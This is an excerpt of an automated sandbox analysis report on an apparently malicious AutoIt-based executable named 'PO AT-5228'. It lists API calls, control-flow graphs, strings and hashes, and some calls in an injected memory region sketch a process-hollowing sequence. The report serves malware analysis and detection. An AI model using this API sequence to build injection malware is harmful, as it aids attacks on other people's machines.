                                                                                        • Instruction Fuzzy Hash: 0CA15B70E00209EBDB54CFA4C894BEEBBB5FF48715F208559E909BB281C775AA45CF90

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1343 b649fb-b64a25 call b6bcce RegOpenKeyExW 1346 bd41cc-bd41e3 RegQueryValueExW 1343->1346 1347 b64a2b-b64a2f 1343->1347 1348 bd41e5-bd4222 call b7f4ea call b647b7 RegQueryValueExW 1346->1348 1349 bd4246-bd424f RegCloseKey 1346->1349 1354 bd423d-bd4245 call b647e2 1348->1354 1355 bd4224-bd423b call b66a63 1348->1355 1354->1349 1355->1354
                                                                                        APIs
                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00B64A1D
                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00BD41DB
                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00BD421A
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00BD4249
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: QueryValue$CloseOpen
                                                                                        • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                        • API String ID: 1586453840-614718249
                                                                                        • Opcode ID: ac0615662104c1b5be0dae267bfe058869ba61e20f25928cdb9880032b0b7cd7
                                                                                        • Instruction ID: 631da625aa2629ce75db38a18f1d4e5d8ed27f5c93ecafc9ab1be326a03ed706
                                                                                        • Opcode Fuzzy Hash: ac0615662104c1b5be0dae267bfe058869ba61e20f25928cdb9880032b0b7cd7
                                                                                        • Instruction Fuzzy Hash: CC112C71600109BFEB04ABA4CD96DBF7BACEF14344F0440A9B606E71A2EBB09E459A50

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1370 b636b8-b63728 CreateWindowExW * 2 ShowWindow * 2
                                                                                        APIs
                                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00B636E6
                                                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00B63707
                                                                                        • ShowWindow.USER32(00000000,?,?,?,?,00B63AA3,?), ref: 00B6371B
                                                                                        • ShowWindow.USER32(00000000,?,?,?,?,00B63AA3,?), ref: 00B63724
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$CreateShow
                                                                                        • String ID: AutoIt v3$edit
                                                                                        • API String ID: 1584632944-3779509399
                                                                                        • Opcode ID: c6bdd9933e9dde53cec778eb1f9ee696045b85cf2ba21464b57a442311dfdb78
                                                                                        • Instruction ID: 164f0bb4d29add5643090d60c78da64ba414bd35fe5a9a4008d6c63e4deb484e
                                                                                        • Opcode Fuzzy Hash: c6bdd9933e9dde53cec778eb1f9ee696045b85cf2ba21464b57a442311dfdb78
                                                                                        • Instruction Fuzzy Hash: 0CF03A715502D47AE7305757AC48F7B3E7ED7D6F20B04002ABE04A71B0C5A10886CAB4

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1475 195fa70-195fb7c call 195d6c0 call 195f960 CreateFileW 1482 195fb83-195fb93 1475->1482 1483 195fb7e 1475->1483 1486 195fb95 1482->1486 1487 195fb9a-195fbb4 VirtualAlloc 1482->1487 1484 195fc33-195fc38 1483->1484 1486->1484 1488 195fbb6 1487->1488 1489 195fbb8-195fbcf ReadFile 1487->1489 1488->1484 1490 195fbd1 1489->1490 1491 195fbd3-195fc0d call 195f9a0 call 195e960 1489->1491 1490->1484 1496 195fc0f-195fc24 call 195f9f0 1491->1496 1497 195fc29-195fc31 ExitProcess 1491->1497 1496->1497 1497->1484
                                                                                        APIs
                                                                                          • Part of subcall function 0195F960: Sleep.KERNEL32(000001F4), ref: 0195F971
                                                                                        • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0195FB72
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1694924142.000000000195D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0195D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_195d000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFileSleep
                                                                                        • String ID: 9OXMYGIHOY7TWA5
                                                                                        • API String ID: 2694422964-1748768190
                                                                                        • Opcode ID: 15f34619e45d072d86438ce6075e31847ae2575daada14dde322fc700fee0838
                                                                                        • Instruction ID: 94742839c03273c5bd78a6ff7d539503b58a8f0286fed43818f7b8b318161203
                                                                                        • Opcode Fuzzy Hash: 15f34619e45d072d86438ce6075e31847ae2575daada14dde322fc700fee0838
                                                                                        • Instruction Fuzzy Hash: 28517071D04249EAEF11DBE4D814BEEBBB8AF54314F0045A9EA08BB2C0D7791B49CB65

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1499 b64139-b64160 call b641a9 1502 b64166-b64174 call b641a9 1499->1502 1503 bd3489-bd3499 call bac396 1499->1503 1502->1503 1510 b6417a-b64180 1502->1510 1506 bd349e-bd34a0 1503->1506 1508 bd34bf-bd3507 call b7f4ea 1506->1508 1509 bd34a2-bd34a5 call b64252 1506->1509 1520 bd3509-bd3526 call b6496c 1508->1520 1521 bd3528 1508->1521 1514 bd34aa-bd34b9 call ba6b49 1509->1514 1513 b64186-b641a6 call b6c833 1510->1513 1510->1514 1514->1508 1522 bd352a-bd353d 1520->1522 1521->1522 1525 bd36b4-bd36c5 call b81c9d call b64252 1522->1525 1526 bd3543 1522->1526 1535 bd36c7-bd36d7 call b64f11 call b7d8f5 1525->1535 1527 bd354a-bd354d call b64f30 1526->1527 1532 bd3552-bd3574 call b6bbfc call ba9cab 1527->1532 1542 bd3588-bd3592 call ba9c95 1532->1542 1543 bd3576-bd3583 1532->1543 1549 bd36dc-bd370c call ba25b5 call b7f55e call b81c9d call b64252 1535->1549 1551 bd35ac-bd35b6 call ba9c7f 1542->1551 1552 bd3594-bd35a7 1542->1552 1545 bd367b-bd368b call b6ba85 1543->1545 1545->1532 1555 bd3691-bd36ae call b64dd9 1545->1555 1549->1535 1559 bd35b8-bd35c5 1551->1559 1560 bd35ca-bd35d4 call b7d90c 1551->1560 1552->1545 1555->1525 1555->1527 1559->1545 1560->1545 1567 bd35da-bd35f2 call ba2551 1560->1567 1573 bd3615-bd3618 1567->1573 1574 bd35f4-bd3613 call b6ce19 call b6cb37 1567->1574 1575 bd361a-bd3635 call b6ce19 call b7c2a5 call b6cb37 1573->1575 1576 bd3646-bd3649 1573->1576 1597 bd3636-bd3644 call b6bbfc 1574->1597 1575->1597 1580 bd3669-bd366c call ba9c12 1576->1580 1581 bd364b-bd3654 call ba2472 1576->1581 1586 bd3671-bd367a call b7f55e 1580->1586 1581->1549 1589 bd365a-bd3664 call b7f55e 1581->1589 1586->1545 1589->1532 1597->1586
                                                                                        APIs
                                                                                          • Part of subcall function 00B641A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00B639FE,?,00000001), ref: 00B641DB
                                                                                        • _free.LIBCMT ref: 00BD36B7
                                                                                        • _free.LIBCMT ref: 00BD36FE
                                                                                          • Part of subcall function 00B6C833: __wsplitpath.LIBCMT ref: 00B6C93E
                                                                                          • Part of subcall function 00B6C833: _wcscpy.LIBCMT ref: 00B6C953
                                                                                          • Part of subcall function 00B6C833: _wcscat.LIBCMT ref: 00B6C968
                                                                                          • Part of subcall function 00B6C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 00B6C978
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                                                        • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                        • API String ID: 805182592-1757145024
                                                                                        • Opcode ID: 8b78f80e7256f098abf4e8b49fd51bfb4da516e7bcde588564bfc0385a909501
                                                                                        • Instruction ID: 6abd55f95f07f10d2ca325519611d62e6364140dbe8cfc05e2b09585fc0f5e88
                                                                                        • Opcode Fuzzy Hash: 8b78f80e7256f098abf4e8b49fd51bfb4da516e7bcde588564bfc0385a909501
                                                                                        • Instruction Fuzzy Hash: 03917D71910219AFCF04EFA4CC919EDBBF4FF19710F1044AAF416AB292EB74AA44CB51
                                                                                        APIs
                                                                                          • Part of subcall function 00B65374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00C21148,?,00B661FF,?,00000000,00000001,00000000), ref: 00B65392
                                                                                          • Part of subcall function 00B649FB: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00B64A1D
                                                                                        • _wcscat.LIBCMT ref: 00BD2D80
                                                                                        • _wcscat.LIBCMT ref: 00BD2DB5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscat$FileModuleNameOpen
                                                                                        • String ID: \$\Include\
                                                                                        • API String ID: 3592542968-2640467822
                                                                                        • Opcode ID: 4f62e18645a7714a5a6e87fad4d453144dd5a87f5a94e2aa4880d8223bee3467
                                                                                        • Instruction ID: a65bfd3160af0cf7540518b199a0a9fa253951e03389684f6812298a87df6db8
                                                                                        • Opcode Fuzzy Hash: 4f62e18645a7714a5a6e87fad4d453144dd5a87f5a94e2aa4880d8223bee3467
                                                                                        • Instruction Fuzzy Hash: 27518275424340AFC724EF59D881EAEB7F4FF59300B4005AEF64993660EB749E19CB52
                                                                                        APIs
                                                                                        • __getstream.LIBCMT ref: 00B834FE
                                                                                          • Part of subcall function 00B87C0E: __getptd_noexit.LIBCMT ref: 00B87C0E
                                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 00B83539
                                                                                        • __wopenfile.LIBCMT ref: 00B83549
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                                        • String ID: <G
                                                                                        • API String ID: 1820251861-2138716496
                                                                                        • Opcode ID: c6f1557a79406fd25012a9e9f2aa39f447f5966ca70b8de1c1b708118ab0284f
                                                                                        • Instruction ID: 7ed87ce350600c9f75c7363f0dc0a6be7a41035e1f7e4bff052f47e31adb2b31
                                                                                        • Opcode Fuzzy Hash: c6f1557a79406fd25012a9e9f2aa39f447f5966ca70b8de1c1b708118ab0284f
                                                                                        • Instruction Fuzzy Hash: 30110670A002069BDB22BF708C426AE37E4EF05F50B1884E5E815CB2B1EB74CA41DBA1
                                                                                        APIs
                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00B7D28B,SwapMouseButtons,00000004,?), ref: 00B7D2BC
                                                                                        • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,00B7D28B,SwapMouseButtons,00000004,?,?,?,?,00B7C865), ref: 00B7D2DD
                                                                                        • RegCloseKey.KERNEL32(00000000,?,?,00B7D28B,SwapMouseButtons,00000004,?,?,?,?,00B7C865), ref: 00B7D2FF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseOpenQueryValue
                                                                                        • String ID: Control Panel\Mouse
                                                                                        • API String ID: 3677997916-824357125
                                                                                        • Opcode ID: e75821033a5bfe7ec3b9d9a1b39e5d4ab643f68acf94b66f45177e2ee24f5ad2
                                                                                        • Instruction ID: d639f56052433791692112c99ae3fcf7677bf8700a27dce2ecbaff45fb0bb852
                                                                                        • Opcode Fuzzy Hash: e75821033a5bfe7ec3b9d9a1b39e5d4ab643f68acf94b66f45177e2ee24f5ad2
                                                                                        • Instruction Fuzzy Hash: 92113975611208BFDB218FA8CC84EAF7BF8EF44794F1088A9E819D7111E671AE419B64
                                                                                        APIs
                                                                                        • CreateProcessW.KERNEL32(?,00000000), ref: 0195F11B
                                                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0195F1B1
                                                                                        • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0195F1D3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1694924142.000000000195D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0195D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_195d000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                        • String ID:
                                                                                        • API String ID: 2438371351-0
                                                                                        • Opcode ID: dbcdd5886b880b5c161ff2c694cfceffc24b8721b5d78ef826e157d7e74dbfef
                                                                                        • Instruction ID: 1c2bcfb123bd8cc1b282436c4c384226294a77315734db334b19d87e0dc96e99
                                                                                        • Opcode Fuzzy Hash: dbcdd5886b880b5c161ff2c694cfceffc24b8721b5d78ef826e157d7e74dbfef
                                                                                        • Instruction Fuzzy Hash: 2A621A30A14218DBEB24CFA4C850BEEB776EF58700F1091A9D60DEB390E7759E81CB59
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                                        • String ID:
                                                                                        • API String ID: 3877424927-0
                                                                                        • Opcode ID: 25276d1f646da7b76298e578b8e053e7e3b96e54df01e447abe6ae266d0f960a
                                                                                        • Instruction ID: 4fd362f54bd0ef3a0ad82601b97059a5c01ba0a9286229fab1d5649f31b10480
                                                                                        • Opcode Fuzzy Hash: 25276d1f646da7b76298e578b8e053e7e3b96e54df01e447abe6ae266d0f960a
                                                                                        • Instruction Fuzzy Hash: B35185B4A04205ABDB24BF69C89596E77E1EF40F20F2486A9F835962F0E775DF50CB40
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00B7EBB2
                                                                                          • Part of subcall function 00B651AF: _memset.LIBCMT ref: 00B6522F
                                                                                          • Part of subcall function 00B651AF: _wcscpy.LIBCMT ref: 00B65283
                                                                                          • Part of subcall function 00B651AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00B65293
                                                                                        • KillTimer.USER32(?,00000001,?,?), ref: 00B7EC07
                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00B7EC16
                                                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00BD3C88
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                        • String ID:
                                                                                        • API String ID: 1378193009-0
                                                                                        • Opcode ID: 81d26eaa3a875d0120cdbc8906cabe71426ec61b4ac6ed50d7b89fdb8435643d
                                                                                        • Instruction ID: 7d66fea3d5fd45ca7972e36d97e216ba7f3b5866cd6fb8bd2ff21c7ddc930e4b
                                                                                        • Opcode Fuzzy Hash: 81d26eaa3a875d0120cdbc8906cabe71426ec61b4ac6ed50d7b89fdb8435643d
                                                                                        • Instruction Fuzzy Hash: 9321F8745047849FE7339B288855BEAFBECDF05704F0404DEE6AE56242D7746A848B52
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00BD3725
                                                                                        • GetOpenFileNameW.COMDLG32 ref: 00BD376F
                                                                                          • Part of subcall function 00B6660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B653B1,?,?,00B661FF,?,00000000,00000001,00000000), ref: 00B6662F
                                                                                          • Part of subcall function 00B640A7: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00B640C6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Name$Path$FileFullLongOpen_memset
                                                                                        • String ID: X
                                                                                        • API String ID: 3777226403-3081909835
                                                                                        • Opcode ID: d956f8a8af25d05a9e9abbb7dad6ef601e0697ae66b97af7e78bd4ad270dcee7
                                                                                        • Instruction ID: bec07e69d49c3b629dcd5cdea0da83d0fc9e01997cea7ec548f36de6c915538e
                                                                                        • Opcode Fuzzy Hash: d956f8a8af25d05a9e9abbb7dad6ef601e0697ae66b97af7e78bd4ad270dcee7
                                                                                        • Instruction Fuzzy Hash: CC21A571A106989FCF01EFD4D845BEEBBF99F49704F0040AAE405B7241DFB89A898F65
                                                                                        APIs
                                                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 00BAC72F
                                                                                        • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00BAC746
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Temp$FileNamePath
                                                                                        • String ID: aut
                                                                                        • API String ID: 3285503233-3010740371
                                                                                        • Opcode ID: 120ada28184f4f767256a692e27bc57298995fbfea9486bb1a1cf030cfee232d
                                                                                        • Instruction ID: 75187146b50d1745a7324c80c2dd5287ceef62af2ce968eb682b5d2072c82dd1
                                                                                        • Opcode Fuzzy Hash: 120ada28184f4f767256a692e27bc57298995fbfea9486bb1a1cf030cfee232d
                                                                                        • Instruction Fuzzy Hash: 18D05E7150030EABDB10AB90DC4EFCAB76C9700709F0001A07750AA0B1DAF0E6998B54
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 798aabf7a103670e4b0dc854748f2a62c595a97f67e83e8a8b8497ef77ddbc2d
                                                                                        • Instruction ID: 4c75b44cbc7a958f31e48d096c24f8e550e4b8d4fb6a1b5a5fb136160f88a5a2
                                                                                        • Opcode Fuzzy Hash: 798aabf7a103670e4b0dc854748f2a62c595a97f67e83e8a8b8497ef77ddbc2d
                                                                                        • Instruction Fuzzy Hash: F6F15C716083019FC710DF28C881B6EBBE5FF88314F1489ADF9999B252D770E945CB82
                                                                                        APIs
                                                                                        • __FF_MSGBANNER.LIBCMT ref: 00B83973
                                                                                          • Part of subcall function 00B881C2: __NMSG_WRITE.LIBCMT ref: 00B881E9
                                                                                          • Part of subcall function 00B881C2: __NMSG_WRITE.LIBCMT ref: 00B881F3
                                                                                        • __NMSG_WRITE.LIBCMT ref: 00B8397A
                                                                                          • Part of subcall function 00B8821F: GetModuleFileNameW.KERNEL32(00000000,00C20312,00000104,00000000,00000001,00000000), ref: 00B882B1
                                                                                          • Part of subcall function 00B8821F: ___crtMessageBoxW.LIBCMT ref: 00B8835F
                                                                                          • Part of subcall function 00B81145: ___crtCorExitProcess.LIBCMT ref: 00B8114B
                                                                                          • Part of subcall function 00B81145: ExitProcess.KERNEL32 ref: 00B81154
                                                                                          • Part of subcall function 00B87C0E: __getptd_noexit.LIBCMT ref: 00B87C0E
                                                                                        • RtlAllocateHeap.NTDLL(01920000,00000000,00000001,00000001,00000000,?,?,00B7F507,?,0000000E), ref: 00B8399F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                        • String ID:
                                                                                        • API String ID: 1372826849-0
                                                                                        • Opcode ID: b843952d22f000411bc1f6393dbbae0d1da61441d08a7f1731caff0a14539edf
                                                                                        • Instruction ID: 264da0527cfde8a5a4c9fdbbe3589eea6181a2c1b29a8e7b9cf231222e7d9735
                                                                                        • Opcode Fuzzy Hash: b843952d22f000411bc1f6393dbbae0d1da61441d08a7f1731caff0a14539edf
